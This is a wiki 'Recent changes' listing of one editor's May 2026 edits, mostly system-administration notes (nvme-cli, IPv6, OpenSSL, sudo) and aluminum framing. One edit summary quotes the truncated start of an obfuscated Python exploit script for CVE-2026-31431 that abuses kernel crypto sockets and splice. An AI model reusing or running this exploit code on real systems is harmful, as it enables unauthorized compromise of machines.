Recent changes
Jump to navigation
Jump to search
Track the most recent changes to the wiki on this page.
List of abbreviations:
- N
- This edit created a new page (also see list of new pages)
- m
- This is a minor edit
- b
- This edit was performed by a bot
- (±123)
- The page size changed by this number of bytes
5 May 2026
| 22:26 | WinGet diffhist +273 Kenneth talk contribs (→Copilot) | ||||
|
|
18:07 | NVMe/nvme-cli 6 changes history +1,130 [Kenneth (6×)] | |||
|
|
18:07 (cur | prev) +161 Kenneth talk contribs (→v2 nvme-cli) | ||||
|
|
18:01 (cur | prev) +3 Kenneth talk contribs (→v2 dependencies) | ||||
|
|
17:44 (cur | prev) +56 Kenneth talk contribs (→v2 nvme-cli) | ||||
|
|
17:44 (cur | prev) +65 Kenneth talk contribs (→v2 libnvme) | ||||
|
|
17:43 (cur | prev) +104 Kenneth talk contribs (→v2 nvme-cli) | ||||
|
|
17:37 (cur | prev) +741 Kenneth talk contribs (→Build and Install v2) | ||||
| N 17:06 | CVE/copy-fail-CVE-2026-31431 diffhist +26 Kenneth talk contribs (Created page with "See CVE/CVE-2026-31431") | ||||
| N 17:05 | CVE/CVE-2026-31431 diffhist +901 Kenneth talk contribs (Created page with "== Copy Fail == === copy_fail_exp.py === <pre> #!/usr/bin/env python3 import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u....") | ||||
4 May 2026
|
|
N 20:10 | Ubuntu/IPv6 2 changes history +293 [Kenneth (2×)] | |||
|
|
20:10 (cur | prev) +3 Kenneth talk contribs | ||||
| N |
|
20:10 (cur | prev) +290 Kenneth talk contribs (Created page with "== Disable IPv6 == <pre> cat >> /etc/sysctl.conf << "EOF" net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 EOF sudo sysctl -p </pre> Premenent: <pre> /etc/default/grub GRUB_CMDLINE_LINUX="ipv6.disable=1" sudo update-grub </pre>") | |||
|
|
18:43 | OpenSSL 3 changes history +605 [Kenneth (3×)] | |||
|
|
18:43 (cur | prev) +73 Kenneth talk contribs (→Remove Password from Private Key) | ||||
|
|
18:40 (cur | prev) +78 Kenneth talk contribs (→Summary) | ||||
|
|
18:17 (cur | prev) +454 Kenneth talk contribs (→Entire Trust Chain PEM) | ||||
|
|
16:07 | Sudo 5 changes history +2,593 [Kenneth (5×)] | |||
|
|
16:07 (cur | prev) +25 Kenneth talk contribs (→sudoers.d) | ||||
|
|
16:06 (cur | prev) +16 Kenneth talk contribs (→Sudo to Root) | ||||
|
|
16:05 (cur | prev) +1 Kenneth talk contribs (→Sudo to Root with User Env) | ||||
|
|
16:05 (cur | prev) +2,482 Kenneth talk contribs (→Edit Sudo Config) | ||||
|
|
16:01 (cur | prev) +69 Kenneth talk contribs (→Other Examples) | ||||
1 May 2026
|
|
20:59 | Aluminum 2 changes history +382 [Kenneth (2×)] | |||
|
|
20:59 (cur | prev) +263 Kenneth talk contribs | ||||
|
|
20:56 (cur | prev) +119 Kenneth talk contribs | ||||
|
|
N 20:55 | 8020 3 changes history +1,734 [Kenneth (3×)] | |||
|
|
20:55 (cur | prev) +64 Kenneth talk contribs | ||||
|
|
20:55 (cur | prev) +27 Kenneth talk contribs (→Name) | ||||
| N |
|
20:54 (cur | prev) +1,643 Kenneth talk contribs (Created page with "== 80/20 Aluminum == 80/20 aluminum is a modular, lightweight T-slot aluminum extrusion framing system, often called "The Industrial Erector Set®," used to build custom frames, machine guards, workstations, and robotics without welding. It is known for its versatility, durability, and easy assembly using T-slot connectors. Synonyms include T-slot aluminum extrusion, aluminum framing, t-slot aluminum structural framing, or aluminum profiles. Key Features and Usage Exam...") | |||
| N 20:50 | 80/20 diffhist +18 Kenneth talk contribs (Redirected page to 8020) | ||||
|
|
N 20:07 | PPA 2 changes history +96 [Kenneth (2×)] | |||
|
|
20:07 (cur | prev) +23 Kenneth talk contribs | ||||
| N |
|
20:06 (cur | prev) +73 Kenneth talk contribs (Created page with "== Ubuntu's Personal Package Archive - PPA == Similar to RHEL's EPEL") | |||
| 20:07 | EPEL diffhist +44 Kenneth talk contribs (→Installation) | ||||